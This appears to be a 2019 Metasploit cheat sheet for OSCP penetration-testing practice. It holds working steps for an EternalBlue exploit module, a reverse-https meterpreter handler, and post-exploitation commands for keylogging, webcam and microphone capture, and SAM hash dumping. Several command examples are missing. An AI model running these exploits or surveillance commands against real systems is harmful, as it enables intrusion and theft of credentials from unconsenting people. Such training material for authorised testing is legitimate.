Title: The Metasploit Framework techniques used and required in Penetration TestingAuthor: unknowndevice64

See Metasploit Unleashed Course in the Essentials

Search for exploits using Metasploit GitHub framework source code:
Translate them for use on OSCP LAB or EXAM.


MetaSploit requires Postfresql

systemctl start postgresql

To enable Postgresql on startup

systemctl enable postgresql

MSF Syntax

Start metasploit


msfconsole -q

Show help for command

show -h

Show Auxiliary modules

show auxiliary

Use a module

use auxiliary/scanner/snmp/snmp_enum
use auxiliary/scanner/http/webdav_scanner
use auxiliary/scanner/smb/smb_version
use auxiliary/scanner/ftp/ftp_login
use exploit/windows/pop3/seattlelab_pass

Show the basic information for a module


Show the configuration parameters for a module

show options

Set options for a module

set THREADS 10

Run the module


Execute an Exploit


Search for a module

search type:auxiliary login

Metasploit Database Access

Show all hosts discovered in the MSF database


Scan for hosts and store them in the MSF database


Search machines for specific ports in MSF database

services -p 443

Leverage MSF database to scan SMB ports (auto-completed rhosts)

services -p 443 --rhosts

Staged and Non-staged

Non-staged payload - is a payload that is sent in its entirety in one go

Staged - sent in two parts Not have enough buffer space Or need to bypass antivirus

MS 17-010 - EternalBlue
You may find some boxes that are vulnerable to MS17-010 (AKA. EternalBlue). Although, not offically part of the indended course, this exploit can be leveraged to gain SYSTEM level access to a Windows box. I have never had much luck using the built in Metasploit EternalBlue module. I found that the elevenpaths version works much more relabily. Here are the instructions to install it taken from the following YouTube video: https://www.youtube.com/watch?v=4OHLor9VaRI

First step is to configure the Kali to work with wine 32bit

dpkg --add-architecture i386 && apt-get update && apt-get install wine32 rm -r ~/.wine wine cmd.exe exit

Download the exploit repostory https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit

Move the exploit to /usr/share/metasploit-framework/modules/exploits/windows/smb or ~/.msf4/modules/exploits/windows/smb

Start metasploit console
I found that using spoolsv.exe as the PROCESSINJECT yielded results on OSCP boxes.

use exploit/windows/smb/eternalblue_doublepulsar
msf exploit(eternalblue_doublepulsar) > set RHOST
msf exploit(eternalblue_doublepulsar) > set PROCESSINJECT spoolsv.exe
PROCESSINJECT => spoolsv.exe
msf exploit(eternalblue_doublepulsar) > run

Experimenting with Meterpreter

Get system information from Meterpreter Shell


Get user id from Meterpreter Shell


Search for a file

search -f *pass*.txt

Upload a file

upload /usr/share/windows-binaries/nc.exe c:\\Users\\Offsec

Download a file

download c:\\Windows\\system32\\calc.exe /tmp/calc.exe

Invoke a command shell from Meterpreter Shell


Exit the meterpreter shell


Metasploit Exploit Multi Handler

multi/handler to accept an incoming reverse_https_meterpreter

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_https
set LHOST $ip
set LPORT 443
[*] Started HTTPS reverse handler on https://$ip:443/

Building Your Own MSF Module

mkdir -p ~/.msf4/modules/exploits/linux/misc
cd ~/.msf4/modules/exploits/linux/misc
cp /usr/share/metasploitframework/modules/exploits/linux/misc/gld\_postfix.rb ./crossfire.rb
nano crossfire.rb

Post Exploitation with Metasploit - (available options depend on OS and Meterpreter Cababilities)
download Download a file or directory
upload Upload a file or directory
portfwd Forward a local port to a remote service
route View and modify the routing table
keyscan_start Start capturing keystrokes
keyscan_stop Stop capturing keystrokes
screenshot Grab a screenshot of the interactive desktop
record_mic Record audio from the default microphone for X seconds
webcam_snap Take a snapshot from the specified webcam
getsystem Attempt to elevate your privilege to that of local system.
hashdump Dumps the contents of the SAM database

Meterpreter Post Exploitation Features
Create a Meterpreter background session

Submitted On: 2019-05-18 13:29:04